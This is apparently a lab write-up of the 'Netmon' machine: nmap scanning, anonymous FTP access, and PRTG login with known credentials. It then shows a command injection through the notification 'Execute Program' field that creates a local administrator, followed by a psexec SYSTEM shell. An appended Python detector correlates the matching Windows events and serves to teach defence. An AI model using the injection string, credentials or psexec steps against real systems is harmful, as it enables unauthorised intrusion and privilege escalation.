1. Reconnaissance
1.1. nmap
In the nmap scan results, the open ports 21 and 80 stand out.
┌──(root㉿kali)-[/home/kali/labs/Netmon]
└─# nmap -sC -sV 10.129.230.176
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-30 10:13 +04
Nmap scan report for 10.129.230.176
Host is up (0.36s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_11-10-23 09:20AM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-12-30T06:13:49
|_ start_date: 2025-12-30T04:49:24
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.83 seconds
1.2. FTP access
Since "Anonymous FTP login allowed" was identified, access is attempted with the anonymous account.
┌──(root㉿kali)-[/home/kali/labs/Netmon]
└─# ftp 10.129.230.176
Connected to 10.129.230.176.
220 Microsoft FTP Service
Name (10.129.230.176:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
Once connected, the Desktop folder is accessible, so the user.txt file can be collected in one go.
ftp> ls
229 Entering Extended Passive Mode (|||50677|)
150 Opening ASCII mode data connection.
02-02-19 11:18PM 1024 .rnd
02-25-19 09:15PM <DIR> inetpub
07-16-16 08:18AM <DIR> PerfLogs
02-25-19 09:56PM <DIR> Program Files
02-02-19 11:28PM <DIR> Program Files (x86)
02-03-19 07:08AM <DIR> Users
11-10-23 09:20AM <DIR> Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50680|)
125 Data connection already open; Transfer starting.
02-25-19 10:44PM <DIR> Administrator
01-15-24 10:03AM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50681|)
150 Opening ASCII mode data connection.
01-15-24 10:03AM <DIR> Desktop
02-03-19 07:05AM <DIR> Documents
07-16-16 08:18AM <DIR> Downloads
07-16-16 08:18AM <DIR> Music
07-16-16 08:18AM <DIR> Pictures
07-16-16 08:18AM <DIR> Videos
226 Transfer complete.
ftp> cd Desktop
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||50683|)
150 Opening ASCII mode data connection.
02-02-19 11:18PM 1195 PRTG Enterprise Console.lnk
02-02-19 11:18PM 1160 PRTG Network Monitor.lnk
12-29-25 11:50PM 34 user.txt
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||50685|)
125 Data connection already open; Transfer starting.
100% |************************************************************************************************************************************************| 34 0.09 KiB/s 00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (0.09 KiB/s)
ftp> quit
221 Goodbye.
┌──(root㉿kali)-[/home/kali/labs/Netmon]
└─# cat user.txt
1.3. Checking SMB shares
I attempted access over SMB, but most of the possible options were blocked, so I did not check any further.
┌──(root㉿kali)-[/home/kali/labs/Netmon]
└─# smbmap -H 10.129.230.176
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Something weird happened on (10.129.230.176) Error occurs while reading from remote(104) on line 1015
[*] Closed 1 connections
┌──(root㉿kali)-[/home/kali/labs/Netmon]
└─# smbclient -N -L //10.129.230.176
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/kali/labs/Netmon]
└─# rpcclient -U ""%"" 10.129.230.176
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
2. Web reconnaissance
2.1. Login attempt
Let's assume the login credentials were found somehow. Log in with prtgadmin PrTg@dmin2019.

2.2. Notification reconnaissance
The Notification feature makes it possible to enter commands. Use the Execute Program feature to run test.txt;net user anon p3nT3st! /add;net localgroup administrators anon /add. That way, an account named anon can be made a member of the administrators group.

Once it has been created correctly, click as shown below and press the bell icon in the top row to test the notification. That is when the command we entered gets executed.

Pressing the bell icon shows the following. Click OK.

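3. Internal network penetration
3.1. Internal network penetration using the anon account
Using the anon account with administrator privileges created above, connecting with psexec gives access with SYSTEM privileges. With that access, the flag can be obtained from root.txt.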
┌──(root㉿kali)-[/home/kali]
└─# impacket-psexec 'anon:p3nT3st!@10.129.230.176'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.129.230.176.....
[*] Found writable share ADMIN$
[*] Uploading file luhdDqbf.exe
[*] Opening SVCManager on 10.129.230.176.....
[*] Creating service JAwL on 10.129.230.176.....
[*] Starting service JAwL.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> cd C:\
C:\> cd Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt
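
A defender-side view of sections 2.2 and 3.1, as an added example that is not part of the original write-up: the account creation, the Administrators group change and the psexec service install correspond to Windows event IDs 4720, 4732 and 7045, and the code below correlates them in order. The event records, the host name NETMON, the timestamps and the field names are constructed for illustration (real 4732 records identify the member by SID, so events are assumed to be normalized to an account name first).

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not taken from the target host), pre-normalized.
EVENTS = [
    {"time": "2025-12-30T07:01:10", "id": 4624, "user": "prtgadmin", "host": "NETMON"},
    {"time": "2025-12-30T07:02:03", "id": 4720, "target": "anon", "host": "NETMON"},
    {"time": "2025-12-30T07:02:04", "id": 4732, "target": "anon",
     "group": "Administrators", "host": "NETMON"},
    {"time": "2025-12-30T07:05:41", "id": 7045, "service": "JAwL",
     "image": "%systemroot%\\luhdDqbf.exe", "host": "NETMON"},
    {"time": "2025-12-30T09:30:00", "id": 7045, "service": "WinDefend",
     "image": "C:\\Program Files\\Windows Defender\\MsMpEng.exe", "host": "NETMON"},
]

WINDOW = timedelta(minutes=30)
# Service binary sitting directly in the Windows directory (the ADMIN$ share root).
ADMIN_ROOT_EXE = re.compile(r"^(%systemroot%|c:\\windows)\\[^\\]+\.exe$", re.I)

def detect(events, window=WINDOW):
    """Alert on: account created -> added to Administrators -> service run from ADMIN$ root."""
    created, promoted, alerts = {}, {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        host = ev["host"]
        if ev["id"] == 4720:  # a user account was created
            created[(host, ev["target"].lower())] = ts
        elif ev["id"] == 4732 and ev["group"].lower() == "administrators":
            # member added to a local group: only flag accounts created moments earlier
            born = created.get((host, ev["target"].lower()))
            if born and ts - born <= window:
                promoted[host] = ts
                alerts.append(("new-account-local-admin", host, ev["target"]))
        elif ev["id"] == 7045 and ADMIN_ROOT_EXE.match(ev["image"]):
            # new service installed whose binary was dropped into the ADMIN$ root
            recent = host in promoted and ts - promoted[host] <= window
            kind = "remote-exec-after-admin-add" if recent else "service-from-admin-share-root"
            alerts.append((kind, host, ev["service"]))
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The 30-minute window is an arbitrary choice for the example; the 7045 rule also fires on its own, at lower severity, when no preceding admin-group change is seen.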